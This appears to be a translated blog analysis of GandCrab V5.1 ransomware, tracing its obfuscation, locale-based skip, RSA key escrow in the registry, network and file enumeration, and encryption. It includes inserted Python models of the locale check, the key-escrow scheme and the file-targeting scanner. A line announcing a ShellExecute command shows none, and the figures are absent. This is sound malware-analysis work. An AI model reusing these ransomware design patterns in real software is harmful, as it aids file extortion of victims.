2025-01-18 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
☣ Preface:
After the WannaCry outbreak that exploited the EternalBlue vulnerability, ransomware has become the most common kind of malware met in day-to-day security defence. The GandCrab ransomware family was captured at the beginning of 2017 or earlier, and by 2018 it had been updated and iterated to version 5.0. At the end of 2018, security researchers discovered the latest version, GandCrab V5.1.
The author's personal view on ransomware: on first hearing of it, it seemed that only an irresistible financial incentive could make a group of people iterate, maintain and develop such malware continuously. It is like running a company: spreading the malware across the whole world has been very successful and looks simple, but the machinery behind it is complex. Besides the complexity of the encryption scheme, the stealth and concealment of the ransomware (string obfuscation and encryption) are also well done.
In any case, whichever APIs the sample uses, and even where it re-implements similar functionality itself, given enough time one can work back from the function behaviour and the assembly to the logic and the reasoning behind it, and so reconstruct it.
✃
1. Warm-up (collecting system information, privilege escalation, registry operations, compatibility/locale matching, encrypting and decrypting key strings, etc.)
2. Enumeration and scanning (network shares, resource enumeration, traversing and scanning files)
3. File encryption (files that pass the filter are matched and encrypted in different ways)
4. Wrap-up (dropping the ransom note, deleting the sample itself, killing processes, etc.)
Most of the ransomware the author has analyzed follows this flow: the sample has to keep the victim's system stable while also protecting itself and completing its own functions, so that it can extort payment.
PS: a mind map is attached at the end of the article.
✃
☛ Preliminary analysis:
1. Online analysis:
Picture 1: online analysis
Picture 2: sample information
2. Tool analysis:
Picture 3: Exeinfo PE
☛ Detailed analysis:
① Loading the sample into IDA, you may see junk-instruction ("flower code") obfuscation, as shown below:
Picture 4: junk-instruction obfuscation
② As shown in the figure above, the GandCrab.00426F7A function marks the start of the ransomware's logic. If a desktop pop-up window reading "We'll be back soon" appears, congratulations: you have caught the GandCrab ransomware, as shown below:
Picture 5: MessageBox
③ The GandCrab.00405FF7 function first creates a process snapshot and walks the process list, so that running processes cannot interfere with file encryption later (for example by holding files open), as shown below:
Picture 6: initializing strings
Picture 7: traversing and comparing processes
Picture 8: process matching finished
④ As shown in figure 3, GandCrab.00405944 is the core function. First, let us look at how it obtains the Windows version information and the token SID, that is, the current privilege level, as shown below:
Picture 9: Windows version Information
Picture 10: current permission level
⑤ The GandCrab.004054BA function reads the keyboard-layout key values from the registry and obtains the default language of the current user and of the system. If any of them matches 0x419 (Russian), 0x422 (Ukrainian), 0x423 (Belarusian), etc., the sample deletes itself and terminates the process, which means the victim is not extorted at all, as shown below:
Picture 11: key value loop
Picture 12: match succeeded
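The following is an added Python model of this locale check, written for this edit and not taken from the sample or from the article. It assumes the inputs look like what the Windows APIs return: the Preload values under HKCU\Keyboard Layout are 8-hex-digit KLIDs whose low 16 bits are a LANGID, and GetSystemDefaultUILanguage / GetUserDefaultUILanguage return LANGIDs. Only the three language IDs the article names are included; the sample's full list ("etc.") is not reproduced, and the machines at the bottom are constructed inputs.

```python
from typing import Iterable, Optional, Tuple

# Language IDs named in the article. The sample's full list is longer ("etc.")
# and is deliberately not guessed here; extend this dict from your own analysis.
BAIL_OUT_LANGIDS = {
    0x0419: "Russian",
    0x0422: "Ukrainian",
    0x0423: "Belarusian",
}


def langid_from_klid(klid: str) -> int:
    """A keyboard layout ID (KLID) such as '00000419' or 'd0010419' is a
    32-bit hex string; its low 16 bits are the input language ID (LANGID)."""
    return int(klid, 16) & 0xFFFF


def should_bail_out(preload_klids: Iterable[str],
                    system_default_langid: int,
                    user_default_langid: int,
                    bail_set=BAIL_OUT_LANGIDS) -> Tuple[bool, Optional[str]]:
    """Model of step ⑤: (True, reason) if any installed keyboard layout, or
    the system or user default language, is on the bail-out list."""
    for klid in preload_klids:
        lid = langid_from_klid(klid)
        if lid in bail_set:
            return True, f"keyboard layout {klid} is {bail_set[lid]}"
    for label, lid in (("system default language", system_default_langid),
                       ("user default language", user_default_langid)):
        if lid in bail_set:
            return True, f"{label} 0x{lid:04X} is {bail_set[lid]}"
    return False, None


# Constructed inputs (not from a real machine): (Preload KLIDs, system, user).
MACHINES = {
    "en-US only": (["00000409"], 0x0409, 0x0409),
    "en-US with Russian as second layout": (["00000409", "00000419"], 0x0409, 0x0409),
    "Ukrainian system language, English user": (["00000409"], 0x0422, 0x0409),
    "German machine": (["00000407"], 0x0407, 0x0407),
}

if __name__ == "__main__":
    for name, args in MACHINES.items():
        verdict, reason = should_bail_out(*args)
        print(f"{name}: {'exit without encrypting' if verdict else 'proceed'}"
              + (f" ({reason})" if reason else ""))
```

On a live Windows host the same inputs come from the Preload values under HKCU\Keyboard Layout and from the two default-language APIs. A practitioner's caveat: because this check keys off installed layouts rather than actual use, adding a layout from the list to a machine satisfies this particular check, but that is not a defence to rely on, since only some families implement it and a later build can drop it.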
⑥ Continuing to trace linearly, the GandCrab.00405016 function gathers system information, retrieves the file system and volume information associated with the disk directory, and then hashes that disk data to derive a random-looking string that is used to create a .lock mutex:
Picture 13: create a mutex
⑦ The GandCrab.0040586C function XOR-decrypts an encrypted string to obtain the first public key (RSA public key 1), as shown below:
Picture 14: obtaining RSA public key 1
⑧ Parameters are pushed onto the stack, security products are scanned for, and critical system data strings are XOR-decrypted, as shown below:
Picture 15: stacking parameters
Picture 16: schematic
Picture 17: system data concatenation
Picture 18: security service traversal
Picture 19: concatenated data
Picture 20: decryption
⑨ SetErrorMode is called so that the system does not display the critical-error-handler message box or surface exceptions, and a critical section is initialized, as shown below:
Picture 21: SetErrorMode
⑩ As shown in the figure above, the GandCrab.00404DC5 function is the core of the ransomware logic. First, random numbers are obtained through Microsoft's CSP (Cryptographic Service Provider) functions, as shown below:
Picture 22: GetModuleHandleA
⑪ A string is decrypted and turns out to be the file-name suffix appended to encrypted files, as shown below:
Picture 23: file suffix
⑫ A key pair is generated at random and the public and private keys are exported, as shown below:
Picture 24: exporting the key
⑬ The registry key ex_data\data is then created and random characters are written to it, as shown below:
Picture 25: setting up the registry
⑭ The hard-coded public key is imported and used to encrypt the data:
Picture 26: importing the hard-coded public key
⑮ The registry key key_datas\datas is created, with public = the generated public key and private = the generated private key encrypted under the hard-coded public key (together with the random bytes and other data)
Picture 27: registry Settings
⑯ The sample has an interesting assignment idiom: values are pushed onto the stack, popped into registers, and then stored to memory variables, as shown below:
Picture 28: assignment idiom
⑰ The key material from the previous step is Base64-encoded (encoding, not encryption), and the ransom warning string is then concatenated with the collected PC data, as shown below:
Picture 29: blackmail warning
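Steps ⑫ to ⑰ describe a classic ransomware key-escrow layout: a fresh key pair per victim, the private half encrypted under a public key hard-coded in the binary, everything Base64-encoded into the registry and the ransom note. The block below is an added example modelling that layout in Python; it is not the sample's code. The sample uses Windows CryptoAPI (CSP) for RSA, whereas here a textbook RSA on Mersenne primes stands in so the block runs anywhere; the per-file stream cipher is a SHA-256 counter stand-in (the article does not identify the real file cipher); one wrapped key per file is an assumption; the registry value names public and private are the ones the article gives; the note text and PC data are constructed. The toy primes are for illustration only and must never be used for real keys.

```python
import base64
import hashlib
import os


def i2b(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def b2i(b: bytes) -> int:
    return int.from_bytes(b, "big")


def make_rsa_key(p: int, q: int, e: int = 65537):
    """Textbook RSA from two primes: returns ((n, e), (n, d))."""
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), (n, pow(e, -1, phi))


def rsa_apply(key, m: int) -> int:
    n, exp = key
    if not 0 <= m < n:
        raise ValueError("value too large for this toy modulus")
    return pow(m, exp, n)


# Toy parameters: Mersenne primes so no prime generator is needed. Fixed or
# Mersenne primes are NOT acceptable in real cryptography (illustration only).
VICTIM_PRIMES = ((1 << 61) - 1, (1 << 89) - 1)             # generated per victim
ATTACKER_PUB, ATTACKER_PRIV = make_rsa_key((1 << 107) - 1,  # only the public half
                                           (1 << 127) - 1)  # is inside the binary


def keystream_xor(data: bytes, key: bytes) -> bytes:
    """Stand-in file cipher (SHA-256 in counter mode); the real file cipher
    is not identified in the article. Symmetric, so it also decrypts."""
    out = bytearray()
    for off in range(0, len(data), 32):
        block = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out += bytes(a ^ b for a, b in zip(data[off:off + 32], block))
    return bytes(out)


def infect(pc_data: dict, files: dict, attacker_pub=ATTACKER_PUB):
    """Steps ⑫-⑰: fresh key pair, escrow the private key, encrypt files."""
    vic_pub, vic_priv = make_rsa_key(*VICTIM_PRIMES)            # ⑫
    enc_priv = rsa_apply(attacker_pub, vic_priv[1])             # ⑭ d under the hard-coded key
    pub_b64 = base64.b64encode(i2b(vic_pub[0])).decode()        # ⑰ Base64 is encoding only
    priv_b64 = base64.b64encode(i2b(enc_priv)).decode()
    registry = {                                                # ⑬ and ⑮ (names from the article)
        "ex_data\\data": os.urandom(8),
        "key_datas\\datas": {"public": pub_b64, "private": priv_b64},
    }
    encrypted = {}
    for name, content in files.items():
        file_key = os.urandom(16)                               # assumption: one key per file,
        wrapped = rsa_apply(vic_pub, b2i(file_key))             # wrapped with the victim public key
        encrypted[name] = (wrapped, keystream_xor(content, file_key))
    note = "\n".join(["ALL YOUR FILES ARE ENCRYPTED (constructed note text)"]
                     + [f"{k}: {v}" for k, v in pc_data.items()]
                     + [f"private: {priv_b64}"])
    return registry, encrypted, note


def recover(registry, encrypted, attacker_priv):
    """What only the holder of the attacker private key can do: unwrap the
    escrowed victim private key, then every per-file key, then every file."""
    vals = registry["key_datas\\datas"]
    n = b2i(base64.b64decode(vals["public"]))
    d = rsa_apply(attacker_priv, b2i(base64.b64decode(vals["private"])))
    out = {}
    for name, (wrapped, body) in encrypted.items():
        file_key = i2b(rsa_apply((n, d), wrapped)).rjust(16, b"\x00")
        out[name] = keystream_xor(body, file_key)
    return out


# Constructed victim data for the demo.
SAMPLE_FILES = {"report.docx": b"quarterly figures", "photo.jpg": bytes(range(256)) * 2}
SAMPLE_PC = {"hostname": "LAB-PC", "user": "alice"}

if __name__ == "__main__":
    reg, enc, note = infect(SAMPLE_PC, SAMPLE_FILES)
    print(note)
    print("recovered:", recover(reg, enc, ATTACKER_PRIV) == SAMPLE_FILES)
```

The point the layout makes: everything the victim machine holds (the registry values, the note, the wrapped per-file keys) is useless without the attacker private key, which never touches the victim. Analysis therefore focuses on recovering the escrowed material before the sample finishes, or on weaknesses in the generation of the victim key, rather than on the ciphertext itself.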
⑱ The file-suffix format string is pushed; at this point the sample is about to enumerate network resources, traverse files, and encrypt them, as shown below:
Picture 30: GandCrab.00403D8E
⑲ Two threads are created inside it; analysis of the first thread is shown below:
Picture 31: callback function
Picture 32: local area Network enumeration
Picture 34: traversing file directories and disks on the local area network
Picture 35: recursive scan
Picture 36: encryption and filtering
Picture 37: encryption process
Picture 38: file encryption with the hard-coded public key
⑳ Analysis of the second thread, as shown below:
Picture 39: local files are encrypted and the process exits
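An added Python model of the scan-and-filter step above (not the sample's code): it builds a small constructed directory tree, walks it recursively the way the enumeration thread does, and applies exclusion rules before a file is handed to the encryption routine. The article does not list the sample's actual rules, so the skipped directories and extensions, the ransom-note name DECRYPT.txt and the encrypted-file suffix .enc used here are assumptions.

```python
import os
import tempfile

# Exclusion rules: assumptions for illustration, not the sample's real list.
SKIP_DIRS = {"windows", "program files", "$recycle.bin"}
SKIP_EXTS = {".exe", ".dll", ".sys", ".lnk"}
NOTE_NAME = "DECRYPT.txt"   # hypothetical ransom-note file name
OWN_EXT = ".enc"            # hypothetical suffix of already-encrypted files


def collect_targets(root):
    """Recursively scan `root` and split files into (targets, skipped).

    Paths come back relative to root with '/' separators so results compare
    across platforms; `skipped` carries the rule that excluded each file."""
    targets, skipped = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        # Prune in place so os.walk never descends into excluded directories
        # (filtering a copy of the list would not prune anything).
        dirnames[:] = sorted(d for d in dirnames if d.lower() not in SKIP_DIRS)
        for name in sorted(filenames):
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            ext = os.path.splitext(name)[1].lower()
            if name == NOTE_NAME:
                skipped.append((rel, "ransom note"))
            elif ext == OWN_EXT:
                skipped.append((rel, "already encrypted"))
            elif ext in SKIP_EXTS:
                skipped.append((rel, "excluded extension"))
            else:
                targets.append(rel)
    return targets, skipped


def build_sample_tree(base):
    """Create a constructed directory tree under `base` for the demo."""
    layout = {
        "Users/alice/report.docx": b"quarterly figures",
        "Users/alice/photo.jpg": b"\xff\xd8\xff",
        "Users/alice/old.enc": b"already locked",
        "Users/alice/DECRYPT.txt": b"note",
        "Users/alice/tool.exe": b"MZ",
        "Windows/System32/kernel32.dll": b"MZ",
        "Program Files/app/data.db": b"sqlite",
    }
    for rel, content in layout.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return base


def demo():
    """Build the tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return collect_targets(build_sample_tree(tmp))


if __name__ == "__main__":
    targets, skipped = demo()
    print("targets:", targets)
    print("skipped:", skipped)
```

Note that the two system directories never appear in either list: pruning happens before descent, which is also why a sample like this can finish scanning a large disk quickly while leaving the OS bootable.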
Finally, the GandCrab.00405252 function is called; it uses ShellExecute to run the following command:
✎ The sample's privilege-escalation code, which uses a CVE exploit, is not analyzed here: the test environment did not satisfy the 0x1000 check, so the escalation routine was skipped. Several of the analysis points above are therefore not precise, but they reconstruct the sample's overall logic.
The hard-coded public-key encryption is implemented through CSP, the "Cryptographic Service Provider" API set provided by Microsoft; the author intends to implement and study it in depth when the opportunity arises.
✃
Mind map: